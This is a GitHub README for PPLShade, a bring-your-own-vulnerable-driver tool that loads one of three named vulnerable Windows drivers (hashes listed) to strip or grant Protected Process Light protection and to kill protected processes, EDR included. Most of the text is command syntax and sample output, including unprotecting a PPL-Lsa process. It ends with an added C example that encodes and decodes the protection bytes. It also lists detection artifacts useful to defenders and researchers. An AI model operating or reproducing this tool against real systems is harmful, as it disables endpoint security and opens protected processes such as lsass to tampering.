# redteamfortress/PPLShade

Repository listing (from the hosting page): owner redteamfortress, repo PPLShade, language C, default branch `main`, no license listed, not archived, not a fork, wiki enabled, no GitHub Pages. Stars 71 (+4 in 1 day, +13 in 7 days, +23 in 30 days), forks 23, watchers 48, 0 open issues. Topics: byovd, edr, edr-bypass, edr-evasion, kernel-driver. Homepage: https://www.linkedin.com/in/jehadabudagga/. Repository last updated 2026-06-12 04:01:35; listing last synced 2026-06-11 04:07:03.

Description: BYOVD tool for manipulating Windows Protected Process Light (PPL) protection at the kernel level.

# PPLShade

Multi-driver BYOVD tool for manipulating Windows Protected Process Light (PPL) protection at the kernel level. It auto-detects which supported vulnerable driver is loaded, resolves EPROCESS field offsets at runtime, and reads and writes kernel memory through the driver's physical-memory mapping primitive.

Tested on Windows 10/11 x64.

## Features

- **Auto-detect** — probes all supported driver symlinks, uses whichever is loaded
- **Driver loader** — copies the driver to `System32\drivers` under a random name, creates and starts the service
- **List** — enumerate all protected processes with protection level, signer type, signature levels, and kernel address
- **Get / Set / Protect** — query or modify protection level and signer type on any process
- **Unprotect** — strip PP/PPL protection and signature levels from any process
- **Kill** — unprotect + terminate any protected process (including EDR)
- **Dynamic offsets** — resolves EPROCESS fields from ntoskrnl exports at runtime, no hardcoded offsets
- **Static CRT** — `/MT` build, single standalone exe, no vcredist dependency

## Usage

```
PPLShade.exe load <driver.sys>           Load driver with random service name
PPLShade.exe unload                      Stop + delete driver service + cleanup

PPLShade.exe list                        List all protected processes
PPLShade.exe get <PID>                   Query protection of a process
PPLShade.exe set <PID> <PP|PPL> <T>      Change protection level + signer
PPLShade.exe protect <PID> <PP|PPL> <T>  Add protection to unprotected process
PPLShade.exe unprotect <PID>             Strip all protection
PPLShade.exe kill <PID>                  Unprotect + terminate
```

**Signer types (`<T>`):** `Authenticode`, `CodeGen`, `Antimalware`, `Lsa`, `Windows`, `WinTcb`, `WinSystem`, `App`

## Examples

### Load a driver
```
PS C:\> .\PPLShade.exe load LECOMAx64.sys
 [>] Copying driver to C:\Windows\System32\drivers\xkqmftab.sys
 [*] Driver copied
 [>] Creating service: xkqmftab
 [*] Service created
 [>] Starting driver...
 [*] Driver started
 [*] Service name: xkqmftab
 [*] Driver path:  C:\Windows\System32\drivers\xkqmftab.sys
 [>] Run 'unload' to stop and clean up when done.
```

### List protected processes
```
PS C:\> .\PPLShade.exe list
 [>] Initializing...
 [*] Ready
 [>] Mapping...
 [*] Ready
 [>] Probing drivers...
 [*] Detected: mtxvxd

    PID | Process              | Level  | Signer          | EXE Sig Level        | DLL Sig Level        | Kernel Addr
 -------+----------------------+--------+-----------------+----------------------+----------------------+--------------------
      4 | System               | PP (2) | WinSystem   (7) | WindowsTcb    (0x1e) | Windows       (0x1c) | 0xffff990660694040
    172 | Registry             | PP (2) | WinSystem   (7) | Unchecked     (0x00) | Unchecked     (0x00) | 0xffff990660763080
    584 | smss.exe             | PPL(1) | WinTcb      (6) | WindowsTcb    (0x3e) | Windows       (0x0c) | 0xffff99066d229040
    968 | services.exe         | PPL(1) | WinTcb      (6) | WindowsTcb    (0x3e) | Windows       (0x0c) | 0xffff99066c0890c0
    664 | lsass.exe            | PPL(1) | Lsa         (4) | Windows       (0x3c) | Microsoft     (0x08) | 0xffff99066c096080

 [*] Enumerated 16 protected processes out of 162 total
```

### Get process protection
```
PS C:\> .\PPLShade.exe get 664
 [>] Initializing...
 [*] Ready
 [>] Mapping...
 [*] Ready
 [>] Probing drivers...
 [*] Detected: mtxvxd

 [*] PID 664 (lsass.exe) is PPL-Lsa (signer=4)
 [>]   EXE Sig:  Windows (0x3C)
 [>]   DLL Sig:  Microsoft (0x08)
 [>]   KAddr:              0xFFFF99066C096080
```

### Unprotect a process
```
PS C:\> .\PPLShade.exe unprotect 3532
 [>] Initializing...
 [*] Ready
 [>] Mapping...
 [*] Ready
 [>] Probing drivers...
 [*] Detected: mtxvxd

 [*] PID 3532 unprotected (was PPL-Lsa)
```

### Kill a protected process
```
PS C:\> .\PPLShade.exe kill 3532
 [>] Initializing...
 [*] Ready
 [>] Mapping...
 [*] Ready
 [>] Probing drivers...
 [*] Detected: mtxvxd

 [*] PID 3532 unprotected (was PPL-Lsa)
 [*] PID 3532 terminated
```

### Protect a process
```
PS C:\> .\PPLShade.exe protect 1234 PPL WinTcb
 [>] Initializing...
 [*] Ready
 [>] Mapping...
 [*] Ready
 [>] Probing drivers...
 [*] Detected: mtxvxd

 [*] PID 1234: protection set to PPL-WinTcb (was None-None)
 [*] PID 1234 is now fully protected with signature levels WindowsTcb / Windows
```

### Unload driver
```
PS C:\> .\PPLShade.exe unload
 [>] Stopping service: xkqmftab
 [*] Driver stopped
 [*] Service deleted
 [*] Driver file deleted: C:\Windows\System32\drivers\xkqmftab.sys
 [*] Cleanup complete
```

## Supported Drivers

| Driver | Symlink | SHA256 |
|--------|---------|--------|
| LECOMAx64.sys | `\\.\LECOMA64_2` | `0F2DFF4116A84241D8CAFE534B63454FB4EA26272DA8977BE03670701EC6631C` |
| ipctype.sys | `\\.\IPCType` | `8E2ACCE10D704C8B511C8B6211A2BE5D8E4ADE91EBCBDA2AC10018E4C0AE99FB` |
| mtxC9CB.sys | `\\.\DosMtxVxd` | `0414C0D5BB6DDBCC84B3D59CE411ACF1ED8B17D17054C6192E0A7594B5146D60` |

All three expose `MmMapIoSpace`, which the tool uses to map physical memory into user mode. SuperFetch (`NtQuerySystemInformation` with the SuperFetch information class) provides the VA→PA translation needed to locate EPROCESS fields in physical memory.

Two practical caveats. First, `load` only works if Windows will start the driver: the Microsoft Vulnerable Driver Blocklist (on by default on Windows 11 22H2 and later, and enforced when HVCI is on) refuses listed drivers, so check whether the driver you plan to use is blocked on the target build before relying on it. Second, the load step leaves the usual BYOVD artifacts for defenders to look for: a new kernel service (System log event 7045 records the service name and image path), a freshly written `.sys` in `System32\drivers` with a random lowercase name (eight letters in the example above), and a driver image whose SHA256 matches one of the hashes in the table.

## Build

1. Open `PPLShade.sln` in Visual Studio 2022
2. Make sure C++ Language Standard is set to **Preview - Features from the Latest C++ Working Draft (/std:c++latest)**; the SuperFetch VA→PA translation layer uses `std::expected`, which requires it
3. Build **Release | x64**

## Disclaimer

This tool is provided for **educational and authorized security research purposes only**. Use of this tool against systems you do not own or have explicit written permission to test is illegal. The author is not responsible for any misuse or damage caused by this tool.

## Credits

**Jehad Abudagga** ([@j3h4ck](https://x.com/j3h4ck))

[![LinkedIn](https://img.shields.io/badge/LinkedIn-jehadabudagga-blue?logo=linkedin)](https://www.linkedin.com/in/jehadabudagga/)
[![Twitter](https://img.shields.io/badge/X-@j3h4ck-black?logo=x)](https://x.com/j3h4ck)
[![Telegram](https://img.shields.io/badge/Telegram-@j3h4ck-blue?logo=telegram)](https://t.me/j3h4ck)
[![Medium](https://img.shields.io/badge/Medium-@jehadbudagga-black?logo=medium)](https://medium.com/@jehadbudagga)
[![GitHub](https://img.shields.io/badge/GitHub-redteamfortress-black?logo=github)](https://github.com/redteamfortress)

## Summary

PPLShade is a bring-your-own-vulnerable-driver (BYOVD) tool for manipulating Windows Protected Process Light (PPL) protection at the kernel level. Its core functions are auto-detecting the loaded driver, resolving EPROCESS offsets dynamically, and reading and writing kernel memory through physical memory mapping; on top of that it can list all protected processes with their details, query or modify a process's protection level and signer type, remove protection, and terminate protected processes. The tool is written in C and built as a single statically linked (static CRT) executable with no extra dependencies. PPLShade is aimed at security researchers and penetration testers assessing and bypassing the PPL mechanism relied on by endpoint detection and response (EDR) products, and has been tested on Windows 10/11 x64.
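## Example: the EPROCESS protection bytes

As an added example (not PPLShade's own code, and not its driver interface): the three EPROCESS bytes that `list`, `get`, `set`, `protect` and `unprotect` read and write, decoded and encoded in portable C. The PS_PROTECTION bit layout (3-bit type, 1-bit audit flag, 4-bit signer) and the `SE_SIGNING_LEVEL_*` values are taken from the public Windows DDK headers; the sample rows are constructed from the `list` output above. One assumption is mine: that `protect` writes the signature-level bytes with the upper flag nibble clear, since the README shows only the level names for that command and does not document what the upper nibble of values like `0x3C` means. Kernel reads and writes, offset resolution and driver IOCTLs are deliberately left out.

```c
/* Added example, not PPLShade's own code: pack/unpack the EPROCESS bytes that
 * PPLShade's list/get/set/protect/unprotect commands operate on. PS_PROTECTION
 * layout and SE_SIGNING_LEVEL_* values are from the public Windows DDK headers;
 * sample rows are constructed from the README's `list` output. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* PS_PROTECTION: bits 0-2 Type, bit 3 Audit, bits 4-7 Signer. */
enum ps_type   { PS_TYPE_NONE = 0, PS_TYPE_PPL = 1, PS_TYPE_PP = 2 };
enum ps_signer { PS_SIGNER_NONE = 0, PS_SIGNER_AUTHENTICODE = 1, PS_SIGNER_CODEGEN = 2,
                 PS_SIGNER_ANTIMALWARE = 3, PS_SIGNER_LSA = 4, PS_SIGNER_WINDOWS = 5,
                 PS_SIGNER_WINTCB = 6, PS_SIGNER_WINSYSTEM = 7, PS_SIGNER_APP = 8 };

static const char *const type_names[]   = { "None", "PPL", "PP" };
static const char *const signer_names[] = { "None", "Authenticode", "CodeGen", "Antimalware",
                                            "Lsa", "Windows", "WinTcb", "WinSystem", "App" };

/* EPROCESS.SignatureLevel / SectionSignatureLevel: the low nibble is an
 * SE_SIGNING_LEVEL_* value. PPLShade prints the whole byte (0x3C for lsass);
 * the README does not document the upper nibble, so only the level is named. */
#define SE_SIGNING_LEVEL_UNCHECKED    0x0
#define SE_SIGNING_LEVEL_AUTHENTICODE 0x4
#define SE_SIGNING_LEVEL_ANTIMALWARE  0x7
#define SE_SIGNING_LEVEL_MICROSOFT    0x8
#define SE_SIGNING_LEVEL_WINDOWS      0xC
#define SE_SIGNING_LEVEL_WINDOWS_TCB  0xE

struct eprocess_protection {
    uint8_t protection;              /* EPROCESS.Protection (PS_PROTECTION)          */
    uint8_t signature_level;         /* EPROCESS.SignatureLevel ("EXE Sig Level")    */
    uint8_t section_signature_level; /* EPROCESS.SectionSignatureLevel ("DLL Sig Level") */
};

uint8_t encode_protection(enum ps_type type, enum ps_signer signer)
{
    return (uint8_t)((type & 0x7) | ((signer & 0xF) << 4));
}
enum ps_type   protection_type(uint8_t p)   { return (enum ps_type)(p & 0x7); }
enum ps_signer protection_signer(uint8_t p) { return (enum ps_signer)(p >> 4); }
int            is_protected(uint8_t p)      { return protection_type(p) != PS_TYPE_NONE; }

const char *signing_level_name(uint8_t level)
{
    switch (level & 0x0F) {
    case SE_SIGNING_LEVEL_UNCHECKED:    return "Unchecked";
    case SE_SIGNING_LEVEL_AUTHENTICODE: return "Authenticode";
    case SE_SIGNING_LEVEL_ANTIMALWARE:  return "Antimalware";
    case SE_SIGNING_LEVEL_MICROSOFT:    return "Microsoft";
    case SE_SIGNING_LEVEL_WINDOWS:      return "Windows";
    case SE_SIGNING_LEVEL_WINDOWS_TCB:  return "WindowsTcb";
    default:                            return "Other";
    }
}

/* Renders "PPL-Lsa", "PP-WinSystem", "None-None": the form PPLShade prints. */
int protection_name(uint8_t p, char *out, size_t n)
{
    unsigned t = protection_type(p), s = protection_signer(p);
    return snprintf(out, n, "%s-%s", t < 3 ? type_names[t] : "Invalid",
                    s < 9 ? signer_names[s] : "Invalid");
}

/* What `unprotect` leaves behind: no type, no signer, both signature levels cleared. */
void unprotect_bytes(struct eprocess_protection *e) { memset(e, 0, sizeof *e); }

/* What `protect <PID> PPL WinTcb` reports: PPL-WinTcb, signature levels
 * WindowsTcb / Windows. Assumption: upper flag nibbles are written as zero. */
void protect_ppl_wintcb_bytes(struct eprocess_protection *e)
{
    e->protection              = encode_protection(PS_TYPE_PPL, PS_SIGNER_WINTCB);
    e->signature_level         = SE_SIGNING_LEVEL_WINDOWS_TCB;
    e->section_signature_level = SE_SIGNING_LEVEL_WINDOWS;
}

int main(void)
{
    /* Constructed rows reproducing the README's `list` output for PIDs 4, 584, 664. */
    struct { const char *name; struct eprocess_protection e; } rows[] = {
        { "System",    { 0x72, 0x1E, 0x1C } },
        { "smss.exe",  { 0x61, 0x3E, 0x0C } },
        { "lsass.exe", { 0x41, 0x3C, 0x08 } },
    };
    char buf[32];
    for (size_t i = 0; i < sizeof rows / sizeof rows[0]; i++) {
        protection_name(rows[i].e.protection, buf, sizeof buf);
        printf("%-10s %-13s exe=%s(0x%02X) dll=%s(0x%02X)\n", rows[i].name, buf,
               signing_level_name(rows[i].e.signature_level), rows[i].e.signature_level,
               signing_level_name(rows[i].e.section_signature_level),
               rows[i].e.section_signature_level);
    }
    struct eprocess_protection e = rows[2].e;
    unprotect_bytes(&e);
    protection_name(e.protection, buf, sizeof buf);
    printf("after unprotect: %s (protected=%d)\n", buf, is_protected(e.protection));
    protect_ppl_wintcb_bytes(&e);
    protection_name(e.protection, buf, sizeof buf);
    printf("after protect PPL WinTcb: %s exe=%s dll=%s\n", buf,
           signing_level_name(e.signature_level), signing_level_name(e.section_signature_level));
    return 0;
}
```

Compile with any C99 compiler (`cc example.c`); it needs no Windows headers. The point to take from it is how little state PPL actually is: one byte of type and signer plus two signature-level bytes, which is why a single arbitrary kernel write primitive from a vulnerable driver is enough to strip or grant protection, and why the `kill` command is nothing more than clearing those bytes and then calling a normal process-termination API.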